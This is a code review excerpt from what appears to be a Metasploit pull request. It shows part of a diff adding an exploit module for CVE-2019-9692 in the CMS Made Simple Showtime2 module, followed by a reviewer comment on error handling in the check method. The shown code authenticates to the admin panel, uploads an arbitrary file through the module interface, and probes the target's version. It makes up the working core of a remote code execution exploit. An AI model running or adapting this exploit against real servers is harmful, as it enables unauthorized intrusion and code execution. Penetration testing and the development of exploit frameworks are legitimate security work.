modules/exploits/multi/http/cmsms_showtime2_rce.rb

```diff
@@ -0,0 +1,165 @@
+        ],
+      'References' =>
+        [
+          ['CVE', '2019-9692'],
+          ['CWE', '434'],
+          ['EDB', '46546'],
+          ['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],
+          ['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' =>
+        [
+          ['3.6.2', {}]
+        ],
+      'Privileged' => false,
+      'DisclosureDate' => "Mar 11 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base CMS Made Simple directory path", '/']),
+        OptString.new('USERNAME', [true, "Username to authenticate with", '']),
+        OptString.new('PASSWORD', [false, "Password to authenticate with", ''])
+      ]
+    )
+  end
+
+  def do_login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
+      'vars_post' => {
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+        'loginsubmit' => 'Submit'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res && res.code == 302 && res.get_cookies =~ /__c=([^deleted].+?);/
+      # datastore['sid'] = $1
+      datastore['sid'] = res.get_cookies.scan(/__c=(.+?);/).flatten.last.to_s
+      datastore['cookies'] = res.get_cookies
+      return
+    end
+
+    fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+  end
+
+  def upload(fname, fcontent)
+    # construct POST data
+    data = Rex::MIME::Message.new
+    data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, "form-data; name=\"mact\"")
+    data.add_part('Upload', nil, nil, "form-data; name=\"m1_upload_submit\"")
+    data.add_part(datastore['sid'], nil, nil, "form-data; name=\"__c\"")
+    data.add_part(fcontent, 'text/plain', nil, "from-data; name=\"m1_input_browse\"; filename=\"#{fname}\"")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s,
+      'headers' => {
+        'Cookie' => datastore['cookies']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res && res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id="showoverview"/i)
+      return
+    end
+
+    return Failure::Unknown
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      # 'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'changelog.inc')
+      'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
```

Comment:
`fail_with` shouldn't be used in a `check` method.

```suggestion
      vprint_error 'Connection failed'
      return CheckCode::Unknown
```